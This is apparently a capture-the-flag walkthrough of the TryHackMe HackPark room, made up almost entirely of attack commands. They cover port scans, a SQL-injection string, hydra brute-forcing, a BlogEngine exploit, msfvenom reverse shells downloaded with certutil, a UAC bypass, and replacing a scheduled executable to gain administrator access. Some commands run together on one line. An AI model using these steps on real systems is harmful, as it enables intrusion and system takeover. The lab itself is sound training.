TryHackMe: HackPark

  1. Deploy the machine and access its web server.
nmap -Pn <ip>
nmap -p1000- -Pn <ip>
nmap -A -p 80,3389 <ip>
nmap -p 80,3389 --script vuln <ip>
  1. What request type is the Windows website login form using?
1' or 1=1--+
Reference :
gobuster dir --wordlist /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://<ip>/ -x php,txt,html,aspx
echo admin > users.txtecho pennywise >> users.txtcat users.txt
hydra -L  <username list> -P <password list> <ip> http-post-form   "/<login url>:username=^USER^&password=^PASS^:F=incorrect" -u -V -F
  1. Now you have logged into the website, are you able to identify the version of the BlogEngine?
searchsploit blogengine
searchsploit -m 46353
nc -lvp 1234
  1. Our netcat session is a little unstable, so lets generate another reverse shell using msfvenom.
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe
python -m SimpleHTTPServer 80
cd \Windows\Tempcertutil -urlcache -f http://<ip>/shell.exe shell.exedir
certutil -urlcache -f http://<ip>/winPEAS.exe winPEAS.exe
msfconsoleuse exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
Set RHOST <Remote IP>
set LHOST <Local IP>
set LPORT <Local Port>
run post/multi/recon/local_exploit_suggester
use exploit/windows/local/bypassuac_eventvwrset SESSION 1run
certutil -urlcache -f winPEAS.bat
cd Program Files (x86)cd SystemSchedulerdir
cd Eventsdir
type 20198415519.INI_LOG.txt
cd ..copy Message.exe Message_bak.exe
msfvenom -p windows/shell_reverse_tcp LHOST=<ip> LPORT=1236 -f exe > Message.exe
nc -lvp 1236
certutil -urlcache -f Message.exe
echo %username%
cd \Users\jeff\Desktopdirtype user.txt
cd \Users\Administrator\Desktoptype root.txt

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

CUN Weekly (1.24–2.6)

How to add a module to Metasploit from Exploit-DB

The underlying principle of SQL Injection Attack

Shift Left, Scale Up Security Using Threat Modelling

Application Layer Gateways — Part I

Chaos Communication Congress or the best way to finish the year

Privacy is at risk when security fails

GDPR and Outsourcing

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store



More from Medium

How to crack ssh password by hydra:

USDC, USDT, UST on Jupiter

HTB Event Horizon [easy] Forensics Challenge

The Kernel is Calling a Zero(day) Pointer — CVE-2013–5065 — Ring Ring